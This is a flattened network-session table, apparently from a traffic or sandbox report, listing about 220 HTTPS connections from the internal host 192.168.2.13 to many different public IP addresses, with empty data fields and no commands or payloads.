                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20994192.168.2.135090243.125.129.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20995192.168.2.1355612210.178.170.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20996192.168.2.1357178183.5.77.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20997192.168.2.133533012.88.240.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20998192.168.2.1348350147.237.85.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20999192.168.2.135268878.84.60.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21000192.168.2.133830899.61.73.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21001192.168.2.1334960129.165.184.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21002192.168.2.1338410169.28.24.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21003192.168.2.133672290.100.127.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21004192.168.2.1340286174.247.105.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21005192.168.2.1345058102.244.197.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21006192.168.2.133556497.131.114.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21007192.168.2.133720878.19.118.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21008192.168.2.133507487.96.178.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21009192.168.2.1342870187.10.60.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21010192.168.2.133578289.26.170.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21011192.168.2.1360984140.45.196.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21012192.168.2.1340122128.136.172.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21013192.168.2.1358862108.46.128.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21014192.168.2.1360786186.192.165.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21015192.168.2.1349576132.88.24.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21016192.168.2.133384064.108.89.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21017192.168.2.133674265.62.201.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21018192.168.2.1350076158.68.227.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21019192.168.2.1353072126.203.131.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21020192.168.2.1350092174.101.91.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21021192.168.2.1344552209.169.73.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21022192.168.2.1334304136.48.214.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21023192.168.2.1335466204.78.57.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21024192.168.2.1355066206.182.213.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21025192.168.2.1358908189.127.172.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21026192.168.2.13536901.247.215.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21027192.168.2.1343762178.183.55.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21028192.168.2.134517694.147.176.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21029192.168.2.1343518146.236.243.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21030192.168.2.135543634.165.21.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21031192.168.2.135463212.255.225.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21032192.168.2.1354802123.14.4.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21033192.168.2.13481109.232.225.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21034192.168.2.135149075.199.128.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21035192.168.2.1349540200.106.42.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21036192.168.2.1337174159.180.86.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21037192.168.2.1357456202.167.238.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21038192.168.2.1342452203.244.185.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21039192.168.2.1352018145.25.163.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21040192.168.2.133564038.159.216.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21041192.168.2.133522688.221.35.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21042192.168.2.1341814105.155.215.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21043192.168.2.1352522172.172.34.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21044192.168.2.133290813.190.188.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21045192.168.2.1350294177.223.12.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21046192.168.2.1340746121.22.109.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21047192.168.2.1336822222.20.193.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21048192.168.2.1357430138.8.89.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21049192.168.2.1337308171.11.73.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21050192.168.2.1357720139.154.88.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21051192.168.2.134338676.148.70.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21052192.168.2.1333682159.138.248.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21053192.168.2.1359104143.138.157.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21054192.168.2.135003890.156.107.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21055192.168.2.1355640149.243.84.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21056192.168.2.134929695.27.235.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21057192.168.2.135540658.175.235.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21058192.168.2.1348902199.166.151.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21059192.168.2.1337080160.181.245.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21060192.168.2.1349656216.26.148.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21061192.168.2.13513169.109.49.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21062192.168.2.133792465.250.128.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21063192.168.2.1357708100.44.11.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21064192.168.2.1336448191.178.9.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21065192.168.2.135088848.153.52.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21066192.168.2.133918489.228.37.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21067192.168.2.1334408207.81.0.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21068192.168.2.133903486.209.132.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21069192.168.2.135901232.23.132.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21070192.168.2.1359152108.131.167.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21071192.168.2.1336068202.245.28.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21072192.168.2.1335378163.121.163.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21073192.168.2.135289052.5.149.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21074192.168.2.1352518125.48.68.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21075192.168.2.135860063.73.204.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21076192.168.2.1352336218.197.229.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21077192.168.2.1344736173.43.225.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21078192.168.2.1341546178.217.160.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21079192.168.2.135290865.189.118.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21080192.168.2.1349072211.3.110.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21081192.168.2.135845018.238.161.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21082192.168.2.1358574192.153.46.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21083192.168.2.1357414184.16.40.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21084192.168.2.1338124133.142.195.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21085192.168.2.135472260.232.182.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21086192.168.2.133883885.187.165.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21087192.168.2.1355906157.51.202.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21088192.168.2.1346562178.216.254.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21089192.168.2.1334912147.2.145.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21090192.168.2.1340534222.206.37.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21091192.168.2.1338058140.8.8.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21092192.168.2.1337374181.10.123.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21093192.168.2.1340670207.187.66.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21094192.168.2.133678098.53.0.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21095192.168.2.1357910207.99.166.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21096192.168.2.1360750196.55.161.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21097192.168.2.135233275.193.2.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21098192.168.2.1351246177.32.29.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21099192.168.2.1354906220.166.90.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21100192.168.2.1335680124.83.16.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21101192.168.2.1357034212.104.176.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21102192.168.2.135091217.158.97.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21103192.168.2.135987214.227.76.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21104192.168.2.134096681.9.62.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21105192.168.2.133688081.172.242.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21106192.168.2.1359636103.58.75.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21107192.168.2.1350996104.235.35.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21108192.168.2.1355544126.5.231.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21109192.168.2.133691273.182.79.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21110192.168.2.1352410166.182.37.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21111192.168.2.1359004118.90.99.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21112192.168.2.135235636.103.59.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21113192.168.2.133766694.168.244.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21114192.168.2.1355076125.232.169.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21115192.168.2.1334526186.230.198.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21116192.168.2.1333048136.76.112.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21117192.168.2.1342396157.116.16.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21118192.168.2.134218663.199.74.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21119192.168.2.1341954126.82.152.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21120192.168.2.1344544172.2.249.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21121192.168.2.1356414112.73.162.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21122192.168.2.135076476.188.195.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21123192.168.2.133730258.187.227.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21124192.168.2.1351100118.244.112.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21125192.168.2.1335708192.37.156.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21126192.168.2.134268282.120.232.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21127192.168.2.1349256209.241.88.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21128192.168.2.1344950204.111.76.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21129192.168.2.1359624156.138.111.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21130192.168.2.1349414222.238.189.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21131192.168.2.1347704171.156.103.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21132192.168.2.133923071.136.101.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21133192.168.2.136043439.18.49.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21134192.168.2.1338784195.224.241.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21135192.168.2.1336192208.210.89.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21136192.168.2.1358152165.40.244.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21137192.168.2.1345088199.195.163.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21138192.168.2.1333328103.150.247.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21139192.168.2.1352984160.65.1.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21140192.168.2.1340582125.149.4.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21141192.168.2.133868263.86.80.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21142192.168.2.1339878105.71.80.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21143192.168.2.1346104109.234.216.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21144192.168.2.133331677.124.85.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21145192.168.2.134612073.243.114.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21146192.168.2.1359228129.91.128.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21147192.168.2.1355826123.138.119.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21148192.168.2.135589038.149.45.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21149192.168.2.134722877.54.146.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21150192.168.2.134363643.114.179.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21151192.168.2.134454288.211.89.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21152192.168.2.133884276.77.168.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21153192.168.2.1352186132.168.239.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21154192.168.2.1354110195.91.98.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21155192.168.2.134771832.189.254.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21156192.168.2.1347080147.167.26.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21157192.168.2.135659089.208.248.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21158192.168.2.1358270164.185.13.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21159192.168.2.1358426161.241.136.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21160192.168.2.1345432109.247.238.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21161192.168.2.135066696.178.83.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21162192.168.2.1334886218.143.198.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21163192.168.2.1347358192.150.95.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21164192.168.2.1351006188.84.115.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21165192.168.2.134148624.22.230.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21166192.168.2.1354200168.224.124.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21167192.168.2.135135076.185.55.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21168192.168.2.1336396158.124.53.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21169192.168.2.1350758204.98.168.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21170192.168.2.1360312170.17.77.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21171192.168.2.134756897.208.8.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21172192.168.2.1347422191.87.152.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21173192.168.2.1334978196.195.173.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21174192.168.2.1343008140.61.248.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21175192.168.2.134774291.237.91.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21176192.168.2.134874425.207.20.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21177192.168.2.133505870.54.109.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21178192.168.2.134423284.66.21.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21179192.168.2.1356482120.156.235.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21180192.168.2.133961066.121.227.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21181192.168.2.135839417.249.213.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21182192.168.2.1344976174.158.177.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21183192.168.2.1343410100.132.186.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21184192.168.2.1347968220.73.108.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21185192.168.2.1347314180.127.84.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21186192.168.2.134381289.71.126.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21187192.168.2.1346728146.176.226.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21188192.168.2.133834237.253.112.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21189192.168.2.133921423.15.156.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21190192.168.2.1350016156.63.214.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21191192.168.2.1338722142.144.31.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21192192.168.2.1341660183.237.110.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21193192.168.2.1355596138.80.135.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21194192.168.2.135460664.208.194.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21195192.168.2.135670292.37.132.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21196192.168.2.134164840.221.218.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21197192.168.2.1360482157.52.220.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21198192.168.2.134519293.114.153.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21199192.168.2.133715668.163.34.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21200192.168.2.1348698209.157.84.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21201192.168.2.1334758121.17.216.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21202192.168.2.1337330181.169.100.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21203192.168.2.1349734207.208.18.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21204192.168.2.1349984217.118.84.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21205192.168.2.1338210171.74.166.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21206192.168.2.1348352205.221.160.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21207192.168.2.135399072.49.45.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21208192.168.2.1347630113.223.23.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21209192.168.2.1357536165.191.183.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21210192.168.2.1338096143.178.124.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21211192.168.2.135073475.242.231.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21212192.168.2.1350168132.231.159.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21213192.168.2.1352220184.173.0.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21214192.168.2.1344258134.161.224.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21215192.168.2.135581850.36.105.65443
